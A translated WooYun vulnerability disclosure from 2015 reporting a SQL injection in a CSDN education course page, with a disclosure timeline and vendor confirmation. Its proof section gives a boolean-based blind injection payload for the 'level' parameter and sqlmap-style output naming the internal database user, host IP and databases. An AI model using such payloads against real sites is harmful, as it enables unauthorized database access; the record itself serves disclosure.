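Vulnerability summary

Bug ID: wooyun-2015-0118770

Vulnerability title: SQL injection vulnerability in a CSDN site

Vendor: CSDN Developer Community

Author: 路人甲

Submitted: 2015-06-07 11:43

Fixed: 2015-07-22 13:38

Published: 2015-07-22 13:38

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 12

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]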


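Vulnerability details

Disclosure status:

2015-06-07: Details reported to the vendor, awaiting vendor handling
2015-06-07: Vendor confirmed; details disclosed to the vendor only
2015-06-17: Details disclosed to core white hats and experts in related fields
2015-06-27: Details disclosed to regular white hats
2015-07-07: Details disclosed to trainee white hats
2015-07-22: Details disclosed to the public

Brief description:

Detailed description: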

http://edu.csdn.net/courses/p4?attr=3&c_id=0&level=2&t=


[Screenshot: x20150607112334.png]

[Screenshot: x20150607112446.png]

Proof of vulnerability:

---
Parameter: level (GET)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: attr=3&c_id=0&level=(SELECT (CASE WHEN (1896=1896) THEN 1896 ELSE 1896*(SELECT 1896 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&t=
---
web application technology: PHP 5.5.17
back-end DBMS: MySQL 5.0
current user: 'csdnedu@192.168.110.26'
available databases [2]:
[*] information_schema
[*] training
Database: training
[57 tables]

Remediation:

It looks like a major fix was made last time.

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2015-06-07 13:37

Vendor reply:

Many thanks.

Latest status:

None yet